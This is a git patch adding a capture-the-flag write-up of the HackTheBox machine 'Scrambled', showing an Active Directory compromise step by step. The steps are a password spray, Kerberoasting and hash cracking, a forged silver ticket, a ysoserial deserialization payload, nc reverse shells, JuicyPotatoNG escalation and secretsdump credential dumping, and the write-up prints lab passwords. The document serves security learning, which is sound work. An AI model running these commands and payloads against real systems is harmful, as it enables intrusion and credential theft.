From d588153cc4b49358f437b5634d0a3c5f184cdb43 Mon Sep 17 00:00:00 2001 From: ARZ <60057481+AbdullahRizwan101@users.noreply.github.com> Date: Fri, 7 Oct 2022 10:37:12 +0500 Subject: [PATCH] Create Scrambled.md --- HackTheBox/Scrambled.md | 450 ++++++++++++++++++++++++++++++++++++++++ 1 file changed, 450 insertions(+) create mode 100644 HackTheBox/Scrambled.md diff --git a/HackTheBox/Scrambled.md b/HackTheBox/Scrambled.md new file mode 100644 index 0000000..0a981a8 --- /dev/null +++ b/HackTheBox/Scrambled.md @@ -0,0 +1,450 @@ +# HackTheBox - Scrambled + +## NMAP + +```bash +PORT STATE SERVICE VERSION +53/tcp open domain? +| fingerprint-strings: +| DNSVersionBindReqTCP: +| version +|_ bind +80/tcp open http Microsoft IIS httpd 10.0 +88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-06-11 20:31:53Z) +135/tcp open msrpc Microsoft Windows RPC +139/tcp open netbios-ssn Microsoft Windows netbios-ssn +389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: scrm.local0., Site: Default-First-Site-Name) +| ssl-cert: Subject: commonName=DC1.scrm.local +| Subject Alternative Name: othername:, DNS:DC1.scrm.local +| Issuer: commonName=scrm-DC1-CA +|_ssl-date: 2022-06-11T20:35:26+00:00; 0s from scanner time. +445/tcp open microsoft-ds? +464/tcp open kpasswd5? +593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 +636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: scrm.local0., Site: Default-First-Site-Name) +| ssl-cert: Subject: commonName=DC1.scrm.local +| Subject Alternative Name: othername:, DNS:DC1.scrm.local +| Issuer: commonName=scrm-DC1-CA +| Public Key type: rsa +| Public Key bits: 2048 +| Signature Algorithm: sha1WithRSAEncryption +1433/tcp open ms-sql-s Microsoft SQL Server +| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback +| Issuer: commonName=SSL_Self_Signed_Fallback +| Public Key type: rsa +| Public Key bits: 2048 +| Signature Algorithm: sha256WithRSAEncryption +| Not valid before: 2022-06-11T20:31:09 +| Not valid after: 2052-06-11T20:31:09 +| MD5: aa54 162f 4724 50c6 9c3d 396f 9fcd 1baa +|_SHA-1: 7925 3b1a 758b 687d 02f9 137e 0199 9eca 21bf 9264 +|_ssl-date: 2022-06-11T20:35:19+00:00; 0s from scanner time. +4411/tcp open found? +| fingerprint-strings: +| DNSStatusRequestTCP, DNSVersionBindReqTCP, GenericLines, JavaRMI, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, NCP, NULL, NotesRPC, R +PCCheck, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServer, TerminalServerCookie, WMSRequest, X11Probe, oracle-tns: +| SCRAMBLECORP_ORDERS_V1.0.3; +| FourOhFourRequest, GetRequest, HTTPOptions, Help, LPDString, RTSPRequest, SIPOptions: +| SCRAMBLECORP_ORDERS_V1.0.3; +|_ ERROR_UNKNOWN_COMMAND; +5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) +9389/tcp open mc-nmf .NET Message Framing +49667/tcp open unknown +49669/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 +49670/tcp open msrpc Microsoft Windows RPC +49688/tcp open unknown +49693/tcp open unknown + +``` + +## PORT 139/455 (SMB) + +Checking for null authentication on smb + + + +## PORT 80 (HTTP) + + + +On the support page we'll see a message about NTLM authentication being disabled on the network means that we can't login with just username and password + + + +There's a page about new user account creation but it wasn't making any request + + + +Another page about contacting to supports reveals a username `ksimpson` + + + +Also there's a page about the sales app troubleshooting + + + + + +This tells that Sales Order application is running on port 4411 + + + +Password reset page tells about password being resetted to same as username so let's try to see if the username we have as a password as ksimpson + +```bash +/opt/kerbrute/kerbrute_linux_amd64 passwordspray users.txt ksimpsond -d scrm.local --dc 10.129.72.45 --user-as-pass + +``` + + + +Since NTLM authentication is disabled we need to do kerberos authentication, we'll need a kerberos ticket for ksimpson for that we can use impacket's `getTGT.py` + +```bash +python3 getTGT.py scrm.local/ksimpson +``` + + + +Now create a variable `KRB5CCNAME` which hold the this ticket + + + +Having the ticket we can try to authenticate on smb with `smbclien` + + + +It didn't work but there's an impacket script called `smbclient.py` which we can try to use + + + +And this worked, we can list the available shares wiith `shares` + + + +These shares can be accsssed with `use share_name` but we were only able to access `Public` share + + + +This share only has a pdf file + + + +It talks about the disabling NTLM authentication as we saw from the alert on the site but it also talks about a SQL so maybe there's a service account we can kerberoast + + + +On performing kerberoasting with `GetUserSPNs.py` + + + +But it seems like it isn't working properly, there was an issue with GetUsersSPNs.py when it's used with +kerberos authentication + +https://github.com/SecureAuthCorp/impacket/issues/1206#issuecomment-961395218 + + + +We can fix this by following the changes mentioned by the machine author himself + +For editing the script we need to know the location of this script for that we can use `-debug` arguement which display where impacket library is installed + + + +After making a small change in the script we can get the TGS for `sqlsvc` account + +```bash +GetUserSPNs.py -request -dc-ip DC1.scrm.local scrm.local/ksimpson -k -no-pass -debug +``` + + + +I didn't had this issue but some people were having the issue openssl in impacket when using GetUserSPNs and the fix for this was to change the TLS contenxt method from v1 to v1_2 + + + +https://github.com/SecureAuthCorp/impacket/issues/856 + + +Running hashcat against this hash we can get it cracked + +```bash +hashcat -a 0 -m 13100 ./sqlsvc_hash.txt /opt/SecLists/Passwords/rockyou.txt --force[ +``` + + + + + +We need to grab sqlsvc's TGT as well + + + +Checking if we are able to login to mssql + +> + +Since administrator is able to access this service we need to perform a `Silver Ticket` attack + +https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/silver-ticket + +## Foothold + +We have everything for crafting a silver ticket but we don't have the domain sid and we can't use impacket's lookupid.py as it requires only NTLM authentication but we could use `rpcclient` and in order to use rpcclient with kerberos authentication we need to install `kinit` and `krb5-user` + +https://michlstechblog.info/blog/linux-kerberos-authentification-against-windows-active-directory/ + +After having this installed we need to edit `/etc/krb5.conf` which defines the kerberos relam + + + +```bash +[libdefaults] + default_realm = SCRM.LOCAL + +[realms] + SCRM.LOCAL = { + kdc = 10.129.73.76 + } +``` + +Using `klist` we can check if we have the ticket in the variable + + + +And now we can use rpcclient with kerberos authentication + +```bash +rpcclient -U 'scrm.local/ksimpson' dc1.scrm.local -k +``` + + + +We can get the domain sid as well by using the command `lookupsid any_user_name` which well return the sid of the user but ignoring the last 4 digits which identifies the user's sid we can get the domain sid which is `S-1-5-21-2743207045-1827831105-2542523200` + +Now that we have all the pieces, we need to use `ticketer.py` from impacket to make our silver ticket but before going into making a ticket we need the NTLM hash for sqlsvc's password so we can just use python to generate us the NTLM hash + +```python +import hashlib,binascii +hash = hashlib.new('md4', "Pegasus60".encode('utf-16le')).digest(); +print (binascii.hexlify(hash)); +``` + + + +```bash +ticketer.py -nthash b999a16500b87d17ec7f2e2a68778f05 -spn MSSQLSvc/dc1.scrm.local -domain scrm.local -domain-sid S-1-5-21-2743207045-1827831105-2542523200 administrator + +``` + + + +We can now login to mssql using mssqlclient, but `xp_cmdshell` was disabled as this will allow us to run system commands + + + +We can enable this by running `enable_xp_cmdshell` + + + + + +We'll need a reverse shell, we can get it by uploading nc.exe + + + + + +After getting a shell as `sqlsvc` I uploaded `ssharphound.exe` to enumerate AD + + + +Using netcat we can transfer this archive on to our system + + + +Uploading the json files from archive to bloodhound + + + +Running shortest path to high targets query didn't showed anything interesting path + + + +## Privilege Escalation (miscsvc) + +Having a look back at the pdf we found it talks about the credentials being retrieved + + + +So going back to mssqclient we can execute quries, let's run a query for getting the database names + +```sql +SELECT name FROM master.dbo.sysdatabases; +``` + + + +Switching to `ScrambleHR` database, we can now list the tables + + +```sql +SELECT * FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_TYPE='BASE TABLE'; +``` + + + +From `UserImport` table we can get credentials for `MiscSvc` + + + +Having the credentials, since NTLM authentication is disabled we can't use winrm to login, so we'll just have to use powershell `Invoke-Command` + +```powershell + +$SecPassword = ConvertTo-SecureString 'ScrambledEggs9900' -AsPlainText -Force + +$Cred = New-Object System.Management.Automation.PSCredential('scrm.local\MiscSvc', $SecPassword) + + Invoke-Command -Computer 127.0.0.1 -Credential $Cred -ScriptBlock { whoami } +``` + + + +Transferring nc in miscsvc's directory we can get a reverse shell as this user + + + +## Privilege Escalation (NT / Authority ) +We are in IT group so we can now access the IT folder from the share and there's ScrambleClient exe and dll + + + +Transferring the dll with nc on windows machine we can reverse this by using `ILSpy` + + + +On loading the dll we can see the variables having the available commands like `LOGON` , `LIST_ORDERS` , `UPLOAD_ORDERS` and `QUIT` we can also see the `ServerPort` variable which as a value of 4411 that's listening on port 4411 + + + +On using the command LIST_ORDERS, it retuns us some kind of base64 text + +Goging back to ILspy, it's actually serializing the data + + + + + + + +We can exploit this by creating a seriialized payload using `ysoserial` using the proper format and gadget for executing commands + +https://github.com/pwntester/ysoserial.net + +Even tho we can use ysoserial on linux with `wine` but I just used it windows as it's an exe + + + + +From the help menu, we can look for gadgets which supports `NetDataContractSerializer` which is a serialization used in .NET applications + +So first let's generate a serialized payload which will make a request to our server just to test if the exploit works + +```powershell +.\ysoserial.exe -f BinaryFormatter -g SessionSecurityToken -o base64 -c "cmd.exe /c curl http://10.10.14.26:2222/" +``` + + + + + +This got a hit on our python server, which means we can run execute commands, so we'll transfer nc and execute it to get a reverse shell + + + + + +And we got a shell as `NT / AUTHORITY`, we can now just change the administrator's password to get the TGT and can use either psexec, wmiexec or smbexec to get a shell, we can even use secretsdump.py to get NTDS.dit + + + + + + + +## psexec + +``` +psexec.py scrm.local/administrator@dc1.scrm.local -k -no-pass +``` + + + +## wmiexec + +```bash +wmiexec.py scrm.local/administrator@dc1.scrm.local -k -no-pass +``` + + + +## smbexec + +```bash +smbexec.py scrm.local/administrator@dc1.scrm.local -k -no-pass +``` + + + +## secretsdump + +Get those hashes + +```bash +secretsdump.py scrm.local/administrator@dc1.scrm.local -k -no-pass +``` + + + + + +## Un-Intended + +The un-intended way for this box was exploting `SeImpersonatePrivilege` which `sqlsvc` user had, the box was blooded by exploiting that privilege through the exploits Juicy and Rouge potato but it was soon patched as port 445 was closed or wasn't responding when trying this exploit. Sometime later Opcode shared a tweet related to a new technique being implemented in JuicyPotato + +![](https://i.imgur.com/YcDmyB4.png) + +We can just download the exe from github + +https://github.com/antonioCoco/JuicyPotatoNG + +To verify that we have the impersonate privilege + +![](https://i.imgur.com/t1IOU9h.png) + +Now running the exploit + +``` +JuicyPotatoNG.exe -t * -p "C:\Windows\system32\cmd.exe" -a "/c whoami > C:\Users\sqlsvc\file.txt" +``` +![](https://i.imgur.com/CxE5mxC.png) + +Reading the file in which we saved the output of `whomai` + +![](https://i.imgur.com/Ns0dipU.png) + +We can get the shell just by running nc again + +![](https://i.imgur.com/ctamevs.png) + +## References + +- https://github.com/SecureAuthCorp/impacket/issues/1206#issuecomment-961395218 +- https://www.vgemba.net/microsoft/Kerberos-Linux-Windows-AD/ +- https://michlstechblog.info/blog/linux-kerberos-authentification-against-windows-active-directory/ +- https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/silver-ticket +- https://www.trustedsec.com/blog/generate-an-ntlm-hash-in-3-lines-of-python/ +- https://github.com/pwntester/ysoserial.net +- https://github.com/antonioCoco/JuicyPotatoNG +- https://twitter.com/splinter_code/status/1572636045086429190?t=75YAkjzDq3TBw2HLBRYUJw&s=33